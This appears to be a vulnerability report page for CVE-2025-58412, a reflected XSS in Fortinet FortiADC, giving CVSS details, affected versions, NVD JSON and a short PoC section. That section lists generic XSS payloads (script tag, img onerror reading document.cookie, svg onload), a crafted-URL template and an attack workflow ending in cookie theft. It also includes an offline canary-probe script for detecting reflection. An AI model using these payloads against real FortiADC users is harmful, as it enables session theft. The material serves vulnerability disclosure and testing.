Security Vulnerability Report
CVE-2025-58412 CVSS 4.7 MEDIUM

CVE-2025-58412

Published: 2025-11-19 10:15:45
Last Modified: 2025-11-20 14:38:46

Description

An improper neutralization of script-related HTML tags in a web page (basic XSS, CWE-80) vulnerability in Fortinet FortiADC 8.0.0, FortiADC 7.6.0 through 7.6.3, FortiADC 7.4 all versions and FortiADC 7.2 all versions may allow an attacker to execute unauthorized code or commands via a crafted URL. In practice this is a reflected XSS: script supplied in the URL is echoed back unencoded and runs in the browser of the FortiADC user who opens the link, not on the appliance itself.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

The 4.7 score is the vendor-supplied (Secondary) assessment, which rates Attack Complexity as High. NVD's Primary assessment of the same issue uses CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Attack Complexity Low) for a base score of 6.1 MEDIUM. Both vectors agree on the reflected-XSS profile: reachable over the network, no privileges required, a victim must open the crafted URL, and scope is Changed because the injected script executes in the victim's browser rather than in the vulnerable component.

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* (versionStartIncluding 7.2.0, versionEndExcluding 7.6.4) - VULNERABLE
cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:* - VULNERABLE
FortiADC 8.0.0
FortiADC 7.6.0 - 7.6.3
FortiADC 7.4 all versions
FortiADC 7.2 all versions

The wildcard CPE covers every 7.2.x, 7.4.x and 7.6.x release below 7.6.4; 8.0.0 is matched separately. The page does not list a fixed 8.0.x release, so consult FG-IR-25-736 before treating any 8.0 build as remediated.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-58412 PoC - Basic XSS in FortiADC -->
<!-- Example: Inject JavaScript alert via URL parameter -->

<!-- Method 1: Using script tag -->
<script>alert(document.domain)</script>

<!-- Method 2: Using img onerror handler -->
<img src=x onerror=alert(document.cookie)>

<!-- Method 3: Using SVG onload handler -->
<svg onload=alert('XSS')>

<!-- Full URL example. The path and parameter are placeholders: neither this page
     nor the vendor advisory names the reflecting endpoint, so they must be
     identified during authorized testing. -->
<!-- https://<target>/path?param=<script>alert(document.cookie)</script> -->

<!-- Attack workflow:
     1. Attacker crafts a malicious URL with the XSS payload
     2. Attacker tricks the victim into opening the URL (phishing, email, etc.)
     3. The victim's browser sends the request to FortiADC
     4. The server reflects the unsanitized input in its response
     5. The victim's browser executes the injected JavaScript
     6. The attacker steals session cookies/credentials via JS -->
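The workflow above reduces to one observable: does the value of the URL parameter come back in the response with `<`, `>` and `"` intact? The script below is an added example written for this page, not code from Fortinet or the PoC author. It builds the crafted URL with a random, tag-shaped canary instead of a live `alert()` payload, then classifies the server's echo as raw (exploitable), entity-encoded (neutralised) or absent. The host and parameter name are hypothetical placeholders, and the two `render` functions are constructed stand-ins for a vulnerable and a hardened server response so the whole thing runs offline.

```python
import html
import secrets
import urllib.parse

# Hypothetical target and parameter: the page and FG-IR-25-736 do not name the
# vulnerable FortiADC endpoint, so these are placeholders for illustration only.
EXAMPLE_BASE_URL = "https://fortiadc.example.internal/path?existing=1"
EXAMPLE_PARAM = "param"


def make_canary():
    """Random, unguessable marker so a hit cannot be a coincidental string on the page."""
    return "xss" + secrets.token_hex(4)


def probe_payload(canary):
    """Tag-shaped probe. If it comes back byte-for-byte, '"', '<' and '>' survived
    unencoded in an attribute context and a real payload such as
    <img src=x onerror=...> would execute."""
    return f'"><{canary}>'


def build_probe_url(base_url, param, canary):
    """Return the crafted URL with the probe percent-encoded into `param`,
    preserving any query parameters the URL already carries."""
    parts = urllib.parse.urlsplit(base_url)
    query = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
    query[param] = probe_payload(canary)
    return urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(query)))


def classify_reflection(body, canary):
    """Classify how the server echoed the probe:
    'raw'     - probe reflected unencoded: reflected XSS is confirmed
    'encoded' - canary present but the tag characters were neutralised
    'absent'  - the parameter value is not reflected at all"""
    if probe_payload(canary) in body:
        return "raw"
    if canary in body:
        return "encoded"
    return "absent"


# Constructed sample responses standing in for a live FortiADC (no network access).
def vulnerable_render(value):
    # Echoes the parameter into an attribute without escaping (the CWE-80 pattern).
    return f'<input name="q" value="{value}">'


def hardened_render(value):
    # Same template with HTML entity encoding applied before interpolation.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def run_probe(render, base_url=EXAMPLE_BASE_URL, param=EXAMPLE_PARAM):
    """Build the URL, decode the parameter as the server would, render, classify."""
    canary = make_canary()
    url = build_probe_url(base_url, param, canary)
    query = urllib.parse.urlsplit(url).query
    value = dict(urllib.parse.parse_qsl(query))[param]
    return classify_reflection(render(value), canary)


if __name__ == "__main__":
    print("vulnerable:", run_probe(vulnerable_render))
    print("hardened:  ", run_probe(hardened_render))
```

Against a real host you would replace `render` with the body of an HTTP GET to the URL returned by `build_probe_url`. A `raw` result is the condition under which every payload in the PoC above fires; an `encoded` result means the output encoding the fix is expected to add is in place for that parameter.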

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-736 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-58412",
    "sourceIdentifier": "psirt@fortinet.com",
    "published": "2025-11-19T10:15:45.257",
    "lastModified": "2025-11-20T14:38:45.610",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A improper neutralization of script-related html tags in a web page (basic xss) vulnerability in Fortinet FortiADC 8.0.0, FortiADC 7.6.0 through 7.6.3, FortiADC 7.4 all versions, FortiADC 7.2 all versions may allow attacker to execute unauthorized code or commands via crafted URL."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "psirt@fortinet.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 2.7
        },
        {
          "source": "nvd@nist.gov",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "psirt@fortinet.com",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-80"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.2.0",
                "versionEndExcluding": "7.6.4",
                "matchCriteriaId": "026A9B16-7DB1-4488-B13D-F61272BAE7F1"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "FE5091E7-982E-451B-B782-4C9669421558"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-736",
        "source": "psirt@fortinet.com",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}